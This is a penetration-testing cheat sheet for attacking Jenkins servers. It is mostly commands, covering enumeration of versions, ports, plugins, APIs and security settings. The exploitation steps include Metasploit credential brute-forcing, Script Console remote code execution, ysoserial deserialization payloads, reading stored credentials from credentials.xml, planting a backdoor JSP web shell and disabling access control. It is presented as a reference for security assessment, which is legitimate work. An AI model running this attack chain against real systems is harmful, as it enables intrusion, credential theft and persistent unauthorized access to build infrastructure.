# Attacking Jenkins - Focused Commands & Key Points

## 1. Jenkins Version Detection:

```
curl -I http://<target>:8080/
```

* Check HTTP headers for Jenkins version.

```
nmap -sV -p 8080 <target_ip>
```

* Nmap version detection.

```
curl http://<target>:8080/jenkins/cli/ | grep -i "Jenkins CLI"
```

* Check for Jenkins CLI.

***

## 2. Jenkins Port Enumeration:

* Default Ports:
  * **8080** (HTTP Web Interface)
  * **50000** (Slave Communication, often overlooked)

```
nmap -sV -p 50000 <target_ip>
```

* Identify slave communication port.

***

## 3. Jenkins CLI Enumeration:

```
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ help
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ list-plugins
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ list-jobs
```

* Enumerate jobs, plugins, and users via Jenkins CLI.

***

## 4. Jenkins Plugin Enumeration:

```
curl http://<target>:8080/jenkins/pluginManager/
```

* List installed plugins (common vulnerability source).

***

## 5. Jenkins Security Realm Enumeration:

```
curl http://<target>:8080/jenkins/configureSecurity/
```

* Identify authentication methods (Jenkins DB, LDAP, etc.).

***

## 6. Jenkins API Enumeration:

```
curl http://<target>:8080/jenkins/api/
curl http://<target>:8080/jenkins/api/json
```

* Identify API endpoints that might expose sensitive data.

***

## 7. Jenkins Access Control Enumeration:

```
curl http://<target>:8080/jenkins/configureSecurity/
```

* Identify misconfigurations in access control settings.

***

## 8. Jenkins Exploitation:

* **Exploiting Weak Credentials**
  * Check for default credentials (`admin:admin`, `admin:password`).

```
msf6 > use auxiliary/scanner/http/jenkins_login
msf6 auxiliary(scanner/http/jenkins_login) > set RHOSTS <target_ip>
msf6 auxiliary(scanner/http/jenkins_login) > run
```

* **Exploiting Script Console (Authenticated RCE)**

```
java -jar jenkins-cli.jar -s http://<target>:8080/jenkins/ groovysh
println "Attacker Shell"
```

* Gain RCE through Jenkins script console.
* **Exploiting Build Job Execution**

```
curl -X POST http://<target>:8080/jenkins/job/test/build
```

* Trigger a job execution for exploitation.

***

## 9. Jenkins Deserialization Vulnerabilities:

* Use **ysoserial** to generate payloads.

```
java -jar ysoserial-all.jar CommonsCollections5 "<payload>" | base64
```

* Inject payloads into vulnerable endpoints.

***

## 10. Jenkins Post-Exploitation & Persistence:

* **Extract Credentials from `credentials.xml`**

```
cat /var/lib/jenkins/credentials.xml
```

* **Establish Persistence:**

```
cp backdoor.jsp /var/lib/jenkins/jobs/
```

* **Modify Access Control for Future Access:**

```
jenkins.security.AuthorizationStrategy$Unsecured
```

***

### **Key Takeaways:**

* **Jenkins Manager Access**: RCE via Jenkins Script Console.
* **Weak Credentials**: Default or weak credentials often present.
* **Plugin Enumeration**: Plugins are a frequent source of vulnerabilities.
* **Jenkins API Exposure**: Can expose sensitive information.
* **Access Control Issues**: Misconfigurations lead to privilege escalation.
* **Deserialization Attacks**: Exploit Java deserialization vulnerabilities.
* **Web Shell Persistence**: Deploy malicious JSP for long-term access.

By structuring this guide effectively, it serves as a powerful reference for Jenkins security assessment and penetration testing.